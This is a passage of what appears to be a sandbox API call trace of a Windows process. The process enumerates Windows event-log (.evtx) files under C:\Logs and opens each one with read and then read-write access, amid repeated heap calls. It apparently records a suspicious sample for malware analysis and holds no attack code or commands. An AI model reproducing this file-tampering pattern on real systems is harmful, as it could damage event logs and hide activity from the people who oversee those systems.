Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0072.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.297] AreFileApisANSI () returned 1 [0072.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0072.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0072.297] AreFileApisANSI () returned 1 [0072.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46518 [0072.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46518, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 49 [0072.298] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.298] GetFileType (hFile=0x428) returned 0x1 [0072.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0072.298] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.298] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.298] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.298] CloseHandle (hObject=0x428) returned 1 [0072.299] AreFileApisANSI () returned 1 [0072.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x45e18 [0072.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x45e18, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 49 [0072.299] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.299] GetFileType (hFile=0x428) returned 0x1 [0072.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0072.299] CloseHandle (hObject=0x428) returned 1 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0072.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.300] AreFileApisANSI () returned 1 [0072.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46908 [0072.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=49 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx") returned 49 [0072.300] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0072.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.300] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.300] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-NetworkProfile%4Operational.evtx", cAlternateFileName="MIFC66~1.EVT")) returned 1 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46588 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46588 | out: hHeap=0x20000) returned 1 [0072.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0072.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0072.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0072.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0072.301] AreFileApisANSI () returned 1 [0072.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx", lpUsedDefaultChar=0x0) returned 59 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.301] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0072.301] AreFileApisANSI () returned 1 [0072.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0072.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0072.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 59 [0072.302] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.302] GetFileType (hFile=0x428) returned 0x1 [0072.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0072.302] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.302] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.302] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.302] CloseHandle (hObject=0x428) returned 1 [0072.308] AreFileApisANSI () returned 1 [0072.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0072.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 59 [0072.309] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0072.309] GetFileType (hFile=0x428) returned 0x1 [0072.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0072.309] CloseHandle (hObject=0x428) returned 1 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0072.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0072.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0072.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.309] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0072.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.309] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0072.310] AreFileApisANSI () returned 1 [0072.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0072.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=59 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx") returned 59 [0072.310] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcf0ff2, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcbcf0ff2, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.310] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.310] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ab3154, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ab3154, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Ntfs%4Operational.evtx", cAlternateFileName="MI6E98~1.EVT")) returned 1 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46588 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46588 | out: hHeap=0x20000) returned 1 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0072.310] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.310] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0072.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0072.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0072.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0072.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0072.311] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.311] AreFileApisANSI () returned 1 [0072.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0072.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.311] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.311] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.311] 